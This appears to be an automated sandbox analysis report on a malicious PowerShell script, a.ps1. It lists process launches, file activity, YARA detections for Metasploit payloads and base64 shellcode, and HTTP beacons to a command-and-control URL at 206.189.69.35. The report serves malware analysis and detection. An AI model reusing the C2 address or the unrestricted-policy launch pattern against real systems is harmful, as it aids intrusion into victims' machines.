          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: System.ni.pdbRSDS source: WER4735.tmp.dmp.13.dr
          Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS)m source: WER4735.tmp.dmp.13.dr
          Source: Binary string: ll.Commands.Utility.pdb^ source: powershell.exe, 00000005.00000000.706645322.0000000008789000.00000004.00000001.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: mscoree.pdb3 source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: ransactions.pdbnn source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: version.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: System.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: System.Management.Automation.pdb@ source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: ore.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: psapi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb2 source: powershell.exe, 00000005.00000000.702935630.00000000077BB000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdbT3yk source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: Amsi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: umerics.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: ransactions.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: System.Transactions.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: Microsoft.PowerShell.Security.pdbp source: WER4735.tmp.dmp.13.dr
          Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://206.189.69.35/x1Fm
Source: Joe Sandbox View | IP Address: 206.189.69.35
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: global traffic | HTTP traffic detected:
  GET /x1Fm HTTP/1.1
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATP; MATP)
  Host: 206.189.69.35
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 206.189.69.35 (reported 6 times)
Source: global traffic | HTTP traffic detected: GET /x1Fm HTTP/1.1 (request repeated; headers identical to the request above)
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 06 Jul 2021 09:59:26 GMT
  Server: Apache/2.4.18 (Ubuntu)
  Content-Length: 275
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: text/html; charset=iso-8859-1
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at 206.189.69.35 Port 80</address></body></html>
Source: powershell.exe, 00000005.00000000.706645322.0000000008789000.00000004.00000001.sdmp | String found in binary or memory: http://206.189.69.35/x1Fm
Source: powershell.exe, 00000000.00000002.772023665.000001CDB7E38000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WerFault.exe, 0000000D.00000002.762935904.0000000004CE4000.00000004.00000001.sdmp | String found in binary or memory: http://crl.m
Source: powershell.exe, 00000000.00000002.772612102.000001CDB8137000.00000004.00000001.sdmp | String found in binary or memory: http://crl.osofts/Microt0
Source: WerFault.exe, 0000000D.00000003.730419455.0000000005770000.00000004.00000001.sdmp | String found in binary or memory: http://localhost/wsman:Microsoft.PowerShell.Workflow
Source: powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
          Source: powershell.exe, 00000000.00000002.754811598.000001CD9FC11000.00000004.00000001.sdmp, powershell.exe, 00000005.00000000.710315225.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
          Source: powershell.exe, 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000000.00000002.767490494.000001CDA1709000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: 00000000.00000002.756668339.000001CDA0120000.00000004.00000001.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: 00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: Process Memory Space: powershell.exe PID: 7144, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt, type: DROPPEDMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA35C026AD0_2_00007FFA35C026AD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA35C009BD0_2_00007FFA35C009BD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA35C0157F0_2_00007FFA35C0157F
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA35C01D700_2_00007FFA35C01D70
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552
          Source: a.ps1, type: SAMPLEMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
          Source: 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
          Source: 00000000.00000002.756668339.000001CDA0120000.00000004.00000001.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.756668339.000001CDA0120000.00000004.00000001.sdmp, type: MEMORYMatched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
          Source: 00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
          Source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
          Source: 00000000.00000002.758338125.000001CDA06AB000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
          Source: 00000000.00000002.772859194.000001CDB8350000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
          Source: 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
          Source: Process Memory Space: powershell.exe PID: 7144, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: Process Memory Space: powershell.exe PID: 7144, type: MEMORYMatched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
          Source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYMatched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
          Source: C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt, type: DROPPEDMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt, type: DROPPEDMatched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
          Source: classification engineClassification label: mal96.troj.evad.winPS1@9/14@0/2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210706
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3124:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5964
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odvubcus.q0n.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be used in galleries to represen
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: a.ps1Virustotal: Detection: 50%
          Source: a.ps1ReversingLabs: Detection: 55%
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\a.ps1'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: Binary string: System.Configuration.Install.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: anagement.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: System.Data.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: umerics.pdb" source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: System.Numerics.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbTR source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: clr.pdb source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: CLBCatQ.pdb! source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: .textn.pdb ` source: powershell.exe, 00000005.00000000.702935630.00000000077BB000.00000004.00000001.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
